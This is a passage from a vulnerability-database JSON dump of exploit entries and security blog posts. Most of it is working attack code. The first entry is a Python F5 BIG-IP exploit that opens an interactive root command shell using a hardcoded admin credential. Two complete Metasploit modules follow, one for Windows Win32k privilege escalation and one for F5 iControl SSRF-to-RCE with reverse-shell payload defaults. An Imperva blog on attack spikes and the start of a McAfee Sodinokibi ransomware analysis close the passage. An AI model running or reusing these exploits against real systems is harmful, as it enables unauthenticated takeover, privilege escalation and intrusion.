requests.post(target_url, headers=headers, json=data, verify=False, timeout=15)\r\n\tif \"/mgmt/shared/authz/tokens/\" not in response.text:\r\n\t\tprint('(-) Get token fail !!!')\r\n\t\tprint('(*) Tested Method 2:') \r\n\t\theader_2 = {\r\n\t\t 'User-Agent': 'hello-world',\r\n\t\t 'Content-Type': 'application/json',\r\n\t\t 'X-F5-Auth-Token': '',\r\n\t\t 'Authorization': 'Basic YWRtaW46QVNhc1M='\r\n\t\t}\r\n\t\tdata_2 = {\r\n\t\t\t\"command\": \"run\", \r\n\t\t\t\"utilCmdArgs\": \"-c whoami\"\r\n\t\t}\r\n\t\tcheck_url = url + '/mgmt/tm/util/bash'\r\n\t\ttry:\r\n\t\t\tresponse2 = requests.post(url=check_url, json=data_2, headers=header_2, verify=False, timeout=20)\r\n\t\t\tif response2.status_code == 200 and 'commandResult' in response2.text:\r\n\t\t\t\twhile True:\r\n\t\t\t\t\tcmd = input(\"(:CMD)> \")\r\n\t\t\t\t\tdata_3 = {\"command\": \"run\", \"utilCmdArgs\": \"-c '%s'\"%(cmd)}\r\n\t\t\t\t\tr = requests.post(url=check_url, json=data_3, headers=header_2, verify=False)\r\n\t\t\t\t\tif r.status_code == 200 and 'commandResult' in r.text:\r\n\t\t\t\t\t\tprint(r.text.split('commandResult\":\"')[1].split('\"}')[0].replace('\\\\n', ''))\r\n\t\t\telse:\r\n\t\t\t\tprint('(-) Not vuln...')\r\n\t\t\t\texit(0)\r\n\t\texcept Exception:\r\n\t\t\tprint('ERROR Connect')\r\n\tprint('(+) Extract token: %s'%(response.text.split('\"selfLink\":\"https://localhost/mgmt/shared/authz/tokens/')[1].split('\"}')[0]))\r\n\twhile True:\r\n\t\tcmd = input(\"(:CMD)> \")\r\n\t\theaders = {\r\n\t\t\t\"Content-Type\": \"application/json\",\r\n\t\t\t\"X-F5-Auth-Token\": \"%s\"%(response.text.split('\"selfLink\":\"https://localhost/mgmt/shared/authz/tokens/')[1].split('\"}')[0])\r\n\t\t}\r\n\t\tdata_json = {\r\n\t\t\t\"command\": \"run\", \r\n\t\t\t\"utilCmdArgs\": \"-c \\'%s\\'\"%(cmd)\r\n\t\t}\r\n\t\texp_url= url + '/mgmt/tm/util/bash'\r\n\t\texp_req = requests.post(exp_url, headers=headers, json=data_json, verify=False, timeout=15)\r\n\t\tif exp_req.status_code == 200 and 'commandResult' in exp_req.text:\r\n\t\t\tprint(exp_req.text.split('commandResult\":\"')[1].split('\"}')[0].replace('\\\\n', ''))\r\n\t\telse:\r\n\t\t\tprint('(-) Not vuln...')\r\n\t\t\texit(0)\r\n\r\nif __name__ == '__main__':\r\n title()\r\n if(len(sys.argv) < 2):\r\n \tprint('[+] USAGE: python3 %s https://<target_url>\\n'%(sys.argv[0]))\r\n \texit(0)\r\n else:\r\n \texploit(sys.argv[1])\n\n# 0day.today [2021-10-12] #", "sourceHref": "https://0day.today/exploit/36067", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-04T01:58:47", "description": "An elevation of privilege vulnerability exists in Microsoft Windows when the Win32k component fails to properly handle objects in memory. This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2019, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers. This Metasploit module is tested against Windows 10 v1703 x86.", "cvss3": {}, "published": "2019-07-17T00:00:00", "type": "zdt", "title": "Microsoft Windows NtUserSetWindowFNID Win32k User Callback Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-8453"], "modified": "2019-07-17T00:00:00", "id": "1337DAY-ID-32993", "href": "https://0day.today/exploit/description/32993", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = ManualRanking\r\n\r\n include Msf::Post::File\r\n include Msf::Exploit::EXE\r\n include Msf::Post::Windows::Priv\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'Windows NtUserSetWindowFNID Win32k User Callback',\r\n 'Description' => %q{\r\n An elevation of privilege vulnerability exists in Windows when the Win32k component\r\n fails to properly handle objects in memory, aka \"Win32k Elevation of Privilege Vulnerability.\"\r\n This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows\r\n Server 2019, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2,\r\n Windows 10, Windows 10 Servers.\r\n\r\n This module is tested against Windows 10 v1703 x86.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' => [\r\n 'ze0r', # Exploit analysis and PoC\r\n 'Kaspersky Lab', # Vulnerability discovery/detection\r\n 'Jacob Robles' # Metasploit module\r\n ],\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X86,\r\n 'SessionTypes' => [ 'meterpreter' ],\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread'\r\n },\r\n 'Targets' => [\r\n [ 'Windows 10 v1703 (Build 15063) x86', {\r\n 'UniqueProcessIdOffset' => 180,\r\n 'TokenOffset' => 252,\r\n 'Version' => 'Windows 10 (Build 15063)'\r\n }\r\n ]\r\n ],\r\n 'References' => [\r\n ['CVE', '2018-8453'],\r\n ['URL', 'https://github.com/ze0r/cve-2018-8453-exp'],\r\n ['URL', 'https://mp.weixin.qq.com/s/ogKCo-Jp8vc7otXyu6fTig'],\r\n ['URL', 'https://mp.weixin.qq.com/s/dcbUeegM0BqErtDufOXfoQ'],\r\n ['URL', 'https://securelist.com/cve-2018-8453-used-in-targeted-attacks/88151/'],\r\n ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8453']\r\n ],\r\n 'Notes' => {\r\n 'SideEffects' => [ARTIFACTS_ON_DISK, SCREEN_EFFECTS],\r\n 'Stability' => [CRASH_OS_RESTARTS]\r\n },\r\n 'DisclosureDate' => '2018-10-09',\r\n 'DefaultTarget' => 0\r\n ))\r\n end\r\n\r\n def target_info\r\n fail_with(Failure::None, 'Session is already elevated') if is_system?\r\n\r\n unless sysinfo['OS'].start_with?(target['Version']) && sysinfo['Architecture'] == 'x86'\r\n fail_with(Failure::NoTarget, 'Target is not compatible with exploit')\r\n end\r\n end\r\n\r\n def write_file_to_target(fname, data)\r\n tempdir = session.sys.config.getenv('TEMP')\r\n file_loc = \"#{tempdir}\\\\#{fname}\"\r\n vprint_warning(\"Attempting to write #{fname} to #{tempdir}\")\r\n write_file(file_loc, data)\r\n vprint_good(\"#{fname} written\")\r\n file_loc\r\n rescue Rex::Post::Meterpreter::RequestError => e\r\n elog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\")\r\n fail_with(Failure::Unknown, \"Writing #{fname} to disk was unsuccessful\")\r\n end\r\n\r\n def exploit\r\n target_info\r\n exe_name = 'CVE-2018-8453.exe'\r\n exe_path = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8453', exe_name)\r\n vprint_status(\"Reading payload from file #{exe_path}\")\r\n raw = File.read(exe_path)\r\n\r\n tmp_exe = \"#{Rex::Text.rand_text_alphanumeric(10)}.exe\"\r\n vprint_status(\"Uploading exploit exe as: #{tmp_exe}\")\r\n exe_rpath = write_file_to_target(tmp_exe, raw)\r\n register_file_for_cleanup(exe_rpath)\r\n\r\n tmp_payload = \"#{Rex::Text.rand_text_alpha(6..14)}.exe\"\r\n payload_rpath = write_file_to_target(tmp_payload, generate_payload_exe)\r\n vprint_status(\"Uploading payload #{tmp_payload}\")\r\n register_file_for_cleanup(payload_rpath)\r\n\r\n command = \"\\\"#{exe_rpath}\\\" \\\"#{payload_rpath}\\\" #{target['UniqueProcessIdOffset']} #{target['TokenOffset']}\"\r\n\r\n vprint_status(\"Executing command: #{command}\")\r\n session.sys.process.execute(command, nil, {'Hidden' => false})\r\n print_good('Exploit finished, wait for privileged payload execution to complete.')\r\n end\r\nend\n\n# 0day.today [2019-12-03] #", "sourceHref": "https://0day.today/exploit/32993", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-12T11:09:51", "description": "This Metasploit module exploits a pre-authentication server-side request forgery vulnerability in the F5 iControl REST API's /mgmt/shared/authn/login endpoint to generate an X-F5-Auth-Token that can be used to execute root commands on an affected BIG-IP or BIG-IQ device.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-02T00:00:00", "type": "zdt", "title": "F5 iControl Server-Side Request Forgery / Remote Command Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22986"], "modified": "2021-04-02T00:00:00", "id": "1337DAY-ID-36066", "href": "https://0day.today/exploit/description/36066", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = ExcellentRanking\r\n\r\n prepend Msf::Exploit::Remote::AutoCheck\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::CmdStager\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'F5 iControl REST Unauthenticated SSRF Token Generation RCE',\r\n 'Description' => %q{\r\n This module exploits a pre-auth SSRF in the F5 iControl REST API's\r\n /mgmt/shared/authn/login endpoint to generate an X-F5-Auth-Token that\r\n can be used to execute root commands on an affected BIG-IP or BIG-IQ\r\n device. This vulnerability is known as CVE-2021-22986.\r\n\r\n CVE-2021-22986 affects the following BIG-IP versions:\r\n\r\n * 12.1.0 - 12.1.5\r\n * 13.1.0 - 13.1.3\r\n * 14.1.0 - 14.1.3\r\n * 15.1.0 - 15.1.2\r\n * 16.0.0 - 16.0.1\r\n\r\n And the following BIG-IQ versions:\r\n\r\n * 6.0.0 - 6.1.0\r\n * 7.0.0\r\n * 7.1.0\r\n\r\n Tested against BIG-IP Virtual Edition 16.0.1 in VMware Fusion.\r\n },\r\n 'Author' => [\r\n 'wvu', # Analysis and exploit\r\n 'Rich Warren' # First blood (RCE) and endpoint collaboration\r\n ],\r\n 'References' => [\r\n ['CVE', '2021-22986'],\r\n ['URL', 'https://support.f5.com/csp/article/K03009991'],\r\n ['URL', 'https://attackerkb.com/assessments/f6b19d24-b24e-4abd-98cf-2988d7424311'],\r\n ['URL', 'https://research.nccgroup.com/2021/03/18/rift-detection-capabilities-for-recent-f5-big-ip-big-iq-icontrol-rest-api-vulnerabilities-cve-2021-22986/']\r\n # https://clouddocs.f5.com/products/big-iq/mgmt-api/v7.0.0/ApiReferences/bigiq_public_api_ref/r_auth_login.html\r\n ],\r\n 'DisclosureDate' => '2021-03-10', # Vendor advisory\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => ['unix', 'linux'],\r\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\r\n 'Privileged' => true,\r\n 'Targets' => [\r\n [\r\n 'Unix Command',\r\n {\r\n 'Platform' => 'unix',\r\n 'Arch' => ARCH_CMD,\r\n 'Type' => :unix_cmd,\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => 'cmd/unix/reverse_python_ssl'\r\n }\r\n }\r\n ],\r\n [\r\n 'Linux Dropper',\r\n {\r\n 'Platform' => 'linux',\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'Type' => :linux_dropper,\r\n 'DefaultOptions' => {\r\n 'CMDSTAGER::FLAVOR' => :bourne,\r\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\r\n }\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'SSL' => true\r\n },\r\n 'Notes' => {\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION], # Only one concurrent session\r\n 'SideEffects' => [\r\n IOC_IN_LOGS, # /var/log/restjavad.0.log (rotated)\r\n ACCOUNT_LOCKOUTS, # Unlikely with bigipAuthCookie\r\n ARTIFACTS_ON_DISK # CmdStager\r\n ]\r\n }\r\n )\r\n )\r\n\r\n register_options([\r\n Opt::RPORT(443),\r\n OptString.new('TARGETURI', [true, 'Base path', '/']),\r\n OptString.new('USERNAME', [true, 'Valid admin username', 'admin']),\r\n OptString.new('ENDPOINT', [false, 'Custom token generation endpoint'])\r\n ])\r\n\r\n register_advanced_options([\r\n OptFloat.new('CmdExecTimeout', [true, 'Command execution timeout', 3.5])\r\n ])\r\n end\r\n\r\n def username\r\n datastore['USERNAME']\r\n end\r\n\r\n def user_reference_endpoint\r\n normalize_uri(target_uri.path, '/mgmt/shared/authz/users', username)\r\n end\r\n\r\n def check\r\n generate_token_ssrf ? CheckCode::Vulnerable : CheckCode::Safe\r\n end\r\n\r\n def exploit\r\n return unless (@token ||= generate_token_ssrf)\r\n\r\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\r\n\r\n case target['Type']\r\n when :unix_cmd\r\n execute_command(payload.encoded)\r\n when :linux_dropper\r\n execute_cmdstager\r\n end\r\n end\r\n\r\n def generate_token_ssrf\r\n print_status('Generating token via SSRF...')\r\n vprint_status(\"Username: #{username}\")\r\n vprint_status(\"Endpoint: #{login_reference_endpoint}\")\r\n\r\n res = send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path, '/mgmt/shared/authn/login'),\r\n 'ctype' => 'application/json',\r\n 'data' => {\r\n 'username' => username,\r\n 'bigipAuthCookie' => '',\r\n 'authProviderName' => 'local',\r\n 'loginReference' => {\r\n 'link' => \"https://localhost#{login_reference_endpoint}\"\r\n },\r\n 'userReference' => {\r\n 'link' => \"https://localhost#{user_reference_endpoint}\"\r\n }\r\n }.to_json\r\n )\r\n\r\n unless res&.code == 200 && (@token = res.get_json_document.dig('token', 'token'))\r\n print_error('Failed to generate token')\r\n return\r\n end\r\n\r\n print_good(\"Successfully generated token: #{@token}\")\r\n @token\r\n end\r\n\r\n def execute_command(cmd, _opts = {})\r\n bash_cmd = \"eval $(echo #{Rex::Text.encode_base64(cmd)} | base64 -d)\"\r\n\r\n print_status(\"Executing command: #{bash_cmd}\")\r\n\r\n res = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path, '/mgmt/tm/util/bash'),\r\n 'ctype' => 'application/json',\r\n 'headers' => {\r\n 'X-F5-Auth-Token' => @token\r\n },\r\n 'data' => {\r\n 'command' => 'run',\r\n 'utilCmdArgs' => \"-c '#{bash_cmd}'\"\r\n }.to_json\r\n }, datastore['CmdExecTimeout'])\r\n\r\n unless res\r\n vprint_warning('Command execution timed out')\r\n return\r\n end\r\n\r\n unless res.code == 200 && res.get_json_document['kind'] == 'tm:util:bash:runstate'\r\n fail_with(Failure::PayloadFailed, 'Failed to execute command')\r\n end\r\n\r\n print_good('Successfully executed command')\r\n\r\n return unless (cmd_result = res.get_json_document['commandResult'])\r\n\r\n vprint_line(cmd_result)\r\n end\r\n\r\n def login_reference_endpoint\r\n if datastore['ENDPOINT']\r\n return normalize_uri(target_uri.path, datastore['ENDPOINT'])\r\n end\r\n\r\n @token_generation_endpoint ||= token_generation_endpoints.sample\r\n\r\n normalize_uri(target_uri.path, @token_generation_endpoint)\r\n end\r\n\r\n # Usable token generation endpoints between versions 12.1.4 and 16.0.1\r\n def token_generation_endpoints\r\n %w[\r\n /access/file-path-manager/indexing\r\n /cm/autodeploy/cluster-software-images/indexing\r\n /cm/autodeploy/qkview/indexing\r\n /cm/autodeploy/software-images/indexing\r\n /cm/autodeploy/software-volume-install/indexing\r\n /cm/system/authn/providers/tmos/1f44a60e-11a7-3c51-a49f-82983026b41b/users/indexing\r\n /cm/system/authn/providers/tmos/indexing\r\n /mgmt/shared/analytics/avr-proxy-tasks\r\n /mgmt/shared/gossip\r\n /mgmt/shared/gossip-peer-refresher\r\n /mgmt/shared/identified-devices/config/device-refresh\r\n /mgmt/shared/save-config\r\n /mgmt/tm/shared/bigip-failover-state\r\n /shared/analytics/avr-proxy-tasks\r\n /shared/analytics/avr-proxy-tasks/indexing\r\n /shared/analytics/event-aggregation-tasks/indexing\r\n /shared/analytics/event-analysis-tasks/indexing\r\n /shared/authn/providers/local/groups/indexing\r\n /shared/authz/remote-resources/indexing\r\n /shared/authz/resource-groups/indexing\r\n /shared/authz/roles/indexing\r\n /shared/authz/tokens/indexing\r\n /shared/chassis-framework-upgrades/indexing\r\n /shared/device-discovery-tasks/indexing\r\n /shared/device-group-key-pairs/indexing\r\n /shared/echo/indexing\r\n /shared/framework-info-tasks/indexing\r\n /shared/framework-upgrades/indexing\r\n /shared/gossip\r\n /shared/gossip-peer-refresher\r\n /shared/group-task/indexing\r\n /shared/iapp/blocks/indexing\r\n /shared/iapp/build-package/indexing\r\n /shared/iapp/health-prefix-map/indexing\r\n /shared/iapp/package-management-tasks/indexing\r\n /shared/iapp/template-loader/indexing\r\n /shared/identified-devices/config/device-refresh\r\n /shared/nodejs/loader-path-config/indexing\r\n /shared/package-deployments/indexing\r\n /shared/resolver/device-groups/indexing\r\n /shared/resolver/device-groups/tm-shared-all-big-ips/devices/indexing\r\n /shared/root-framework-upgrades/indexing\r\n /shared/rpm-tasks/indexing\r\n /shared/save-config\r\n /shared/snapshot-task/indexing\r\n /shared/snapshot/indexing\r\n /shared/stats-information/indexing\r\n /shared/storage/tasks/indexing\r\n /shared/task-scheduler/scheduler/indexing\r\n /shared/tmsh-shell/indexing\r\n /tm/analytics/afm-sweeper/generate-report/indexing\r\n /tm/analytics/afm-sweeper/report-results/indexing\r\n /tm/analytics/application-security-anomalies/generate-report/indexing\r\n /tm/analytics/application-security-anomalies/report-results/indexing\r\n /tm/analytics/application-security-network/generate-report/indexing\r\n /tm/analytics/application-security-network/report-results/indexing\r\n /tm/analytics/application-security/generate-report/indexing\r\n /tm/analytics/application-security/report-results/indexing\r\n /tm/analytics/asm-bypass/generate-report/indexing\r\n /tm/analytics/asm-bypass/report-results/indexing\r\n /tm/analytics/asm-cpu/generate-report/indexing\r\n /tm/analytics/asm-cpu/report-results/indexing\r\n /tm/analytics/asm-memory/generate-report/indexing\r\n /tm/analytics/asm-memory/report-results/indexing\r\n /tm/analytics/cpu/generate-report/indexing\r\n /tm/analytics/cpu/report-results/indexing\r\n /tm/analytics/disk-info/generate-report/indexing\r\n /tm/analytics/disk-info/report-results/indexing\r\n /tm/analytics/dns/generate-report/indexing\r\n /tm/analytics/dns/report-results/indexing\r\n /tm/analytics/dos-l3/generate-report/indexing\r\n /tm/analytics/dos-l3/report-results/indexing\r\n /tm/analytics/http/generate-report/indexing\r\n /tm/analytics/http/report-results/indexing\r\n /tm/analytics/ip-intelligence/generate-report/indexing\r\n /tm/analytics/ip-intelligence/report-results/indexing\r\n /tm/analytics/ip-layer/generate-report/indexing\r\n /tm/analytics/ip-layer/report-results/indexing\r\n /tm/analytics/lsn-pool/generate-report/indexing\r\n /tm/analytics/lsn-pool/report-results/indexing\r\n /tm/analytics/memory/generate-report/indexing\r\n /tm/analytics/memory/report-results/indexing\r\n /tm/analytics/network/generate-report/indexing\r\n /tm/analytics/network/report-results/indexing\r\n /tm/analytics/pem/generate-report/indexing\r\n /tm/analytics/pem/report-results/indexing\r\n /tm/analytics/proc-cpu/generate-report/indexing\r\n /tm/analytics/proc-cpu/report-results/indexing\r\n /tm/analytics/protocol-security-http/generate-report/indexing\r\n /tm/analytics/protocol-security-http/report-results/indexing\r\n /tm/analytics/protocol-security/generate-report/indexing\r\n /tm/analytics/protocol-security/report-results/indexing\r\n /tm/analytics/sip/generate-report/indexing\r\n /tm/analytics/sip/report-results/indexing\r\n /tm/analytics/swg-blocked/generate-report/indexing\r\n /tm/analytics/swg-blocked/report-results/indexing\r\n /tm/analytics/swg/generate-report/indexing\r\n /tm/analytics/swg/report-results/indexing\r\n /tm/analytics/tcp-analytics/generate-report/indexing\r\n /tm/analytics/tcp-analytics/report-results/indexing\r\n /tm/analytics/tcp/generate-report/indexing\r\n /tm/analytics/tcp/report-results/indexing\r\n /tm/analytics/udp/generate-report/indexing\r\n /tm/analytics/udp/report-results/indexing\r\n /tm/analytics/vcmp/generate-report/indexing\r\n /tm/analytics/vcmp/report-results/indexing\r\n /tm/analytics/virtual/generate-report/indexing\r\n /tm/analytics/virtual/report-results/indexing\r\n /tm/shared/bigip-failover-state\r\n /tm/shared/sys/backup/indexing\r\n ]\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-12] #", "sourceHref": "https://0day.today/exploit/36066", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "impervablog": [{"lastseen": "2021-04-06T10:29:57", "description": "On March 10th F5 published a [security advisory](<https://support.f5.com/csp/article/K02566623>) containing twenty one CVEs, the most critical one (CVE-2021-22986) can be exploited for unauthenticated remote code execution attacks. In the past week, several security researchers have reverse engineered the Java software patch published by BIG-IP and posted tweets and blogs with detailed POCs.\n\nAs a result, we observed multiple exploitation attempts against our customers in the last 5 days, while 90% of all occurred in the last 48 hours (March 21-22, 2021). This is probably due to the publication of a POC written in python, available in a [GitHub](<https://github.com/h4x0r-dz/RCE-Exploit-in-BIG-IP/blob/main/f5_rce.py>) repository.\n\nLooking at the client type of the requests, the vast majority of the attacks were classified as coming from automated software.\n\nSo far, Imperva research lab registered dozens of attacking IPs although the majority of attacks came from a handful of IPs indicating, once again, the usage of an automated software.\n\nThe most targeted industries are Education, Business, Retail and Financial Services, as we can see in the chart below:\n\nThe exploits that were published use different endpoints in the product to allow an unauthenticated user to execute commands using **root privileges**.\n\nWe observed two attack vectors that attempt to execute code on the vulnerable server. The first one is an attack chain that contains an SSRF attack that attempts to gain an authenticated session token as the first level, followed by remote command execution as the second level. Most of the indications of this attack observed by Imperva were pointed to the \u201c/mgmt/shared/auth/login\u201d URL. Another interesting behavior observed is an attacker that attempted to include the \u2018ping\u2019 command as a value in the \u2018FilePath\u2019 parameter, to many different websites, all of them were redirected to the same IP address hosted in Amazon, with nginx server installed with port 80 opened.\n\nThe second attack vector observed was a remote command execution (RCE), that targeted the \u201cmgmt/tm/util/bash\u201d URL, which allows an unauthenticated user to execute commands using the \u2018utilCmdArgs&#x27; parameter. In most of the attack attempts of this RCE observed by Imperva, the attacker tried to run \u201ccat /etc/passwd\u201d.\n\nIn several attack attempts, we saw requests containing nslookup to http://&lt;random_domain&gt;.burpcollaborator.net. The Burp Collaborator is a network service that Burp Suite uses when testing web applications for security vulnerabilities.\n\nThese attacks were detected as a new zero-day attack by [Imperva WAF](<https://www.imperva.com/products/web-application-firewall-waf/>) generic security controls. Imperva\u2019s research team has also added new dedicated rules to mitigate these vulnerabilities to block these attacks so Imperva WAF customers are protected Out-Of-the-Box.\n\nThe post [Attacks Spike Following The Disclosure Of CVE-2021-22986: F5 Networks BIG-IP iControl Remote Command Execution Vulnerability](<https://www.imperva.com/blog/attacks-spike-following-the-disclosure-of-cve-2021-22986-f5-networks-big-ip-icontrol-remote-command-execution-vulnerability/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-22T19:45:18", "type": "impervablog", "title": "Attacks Spike Following The Disclosure Of CVE-2021-22986: F5 Networks BIG-IP iControl Remote Command Execution Vulnerability", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22986"], "modified": "2021-03-22T19:45:18", "id": "IMPERVABLOG:3D5A9B1B55D73BE6810D0DB036F8B83F", "href": "https://www.imperva.com/blog/attacks-spike-following-the-disclosure-of-cve-2021-22986-f5-networks-big-ip-icontrol-remote-command-execution-vulnerability/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "trellix": [{"lastseen": "2019-10-02T00:00:00", "description": "# McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service \u2013 What The Code Tells Us\n\nBy **McAfee Labs ** \u00b7 October 2, 2019\n\n## Episode 1: What the Code Tells Us\n\nMcAfee\u2019s Advanced Threat Research team (ATR) observed a new ransomware family in the wild, dubbed Sodinokibi (or REvil), at the end of April 2019. Around this same time, the GandCrab ransomware crew announced they would shut down their operations. Coincidence? Or is there more to the story?\n\nIn this series of blogs, we share fresh analysis of Sodinokibi and its connections to GandCrab, with new insights gleaned exclusively from McAfee ATR\u2019s in-depth and extensive research.\n\n * Episode 1: [What the Code Tells Us](<https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/>)\n * Episode 2: [The All-Stars](<https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-the-all-stars/>)\n * Episode 3: [Follow the Money](<https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-follow-the-money/>)\n * Episode 4: [Crescendo](<https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-crescendo/>)\n\nIn this first instalment we share our extensive malware and post-infection analysis and visualize exactly how big the Sodinokibi campaign is.\n\n## Background\n\nSince its arrival in April 2019, it has become very clear that the new kid in town, \u201cSodinokibi\u201d or \u201cREvil\u201d is a serious threat. The name Sodinokibi was discovered in the hash ccfde149220e87e97198c23fb8115d5a where \u2018Sodinokibi.exe\u2019 was mentioned as the internal file name; it is also known by the name of REvil.\n\nAt first, Sodinokibi ransomware was observed propagating itself by exploiting a vulnerability in Oracle\u2019s WebLogic server. However, similar to some other ransomware families, Sodinokibi is what we call a Ransomware-as-a-Service (RaaS), where a group of people maintain the code and another group, known as affiliates, spread the ransomware.\n\nThis model allows affiliates to distribute the ransomware any way they like. Some affiliates prefer mass-spread attacks using phishing-campaigns and exploit-kits, where other affiliates adopt a more targeted approach by brute-forcing RDP access and uploading tools and scripts to gain more rights and execute the ransomware in the internal network of a victim. We have investigated several campaigns spreading Sodinokibi, most of which had different modus operandi but we did notice many started with a breach of an RDP server.\n\n## Who and Where is Sodinokibi Hitting?\n\nBased on visibility from [MVISION Insights](<https://www.mcafee.com/enterprise/en-us/solutions/lp/mvision-insights.html?eid=RBUULBZJ&smcid=BL&utm_campaign=MV_INS_19Q3&utm_source=mcafeeblog&utm_medium=organic>) we were able to generate the below picture of infections observed from May through August 23rd, 2019:\n\n \n\n\nWho is the target? Mostly organizations, though it really depends on the skills and expertise from the different affiliate groups on who, and in which geo, they operate.\n\n## Reversing the Code\n\nIn this first episode, we will dig into the code and explain the inner workings of the ransomware once it has executed on the victim\u2019s machine.\n\nOverall the code is very well written and designed to execute quickly to encrypt the defined files in the configuration of the ransomware. The embedded configuration file has some interesting options which we will highlight further in this article.\n\nBased on the code comparison analysis we conducted between GandCrab and Sodinokibi we consider it a likely hypothesis that the people behind the Sodinokibi ransomware may have some type of relationship with the GandCrab crew.\n\n FIGURE 1.1. OVERVIEW OF SODINOKIBI\u2019S EXECUTION FLAW \n\n\n## Inside the Code\n\n## Sodinokibi Overview\n\nFor this article we researched the sample with the following hash (packed):\n\n \n\n\n**The main goal of this malware, as other ransomware families, is to encrypt your files and then request a payment in return for a decryption tool from the authors or affiliates to decrypt them. **\n\nThe malware sample we researched is a 32-bit binary, with an icon in the packed file and without one in the unpacked file. The packer is programmed in Visual C++ and the malware itself is written in pure assembly.\n\n## Technical Details\n\nThe goal of the packer is to decrypt the true malware part and use a RunPE technique to run it from memory. To obtain the malware from memory, after the decryption is finished and is loaded into the memory, we dumped it to obtain an unpacked version.\n\nThe first action of the malware is to get all functions needed in runtime and make a dynamic IAT to try obfuscating the Windows call in a static 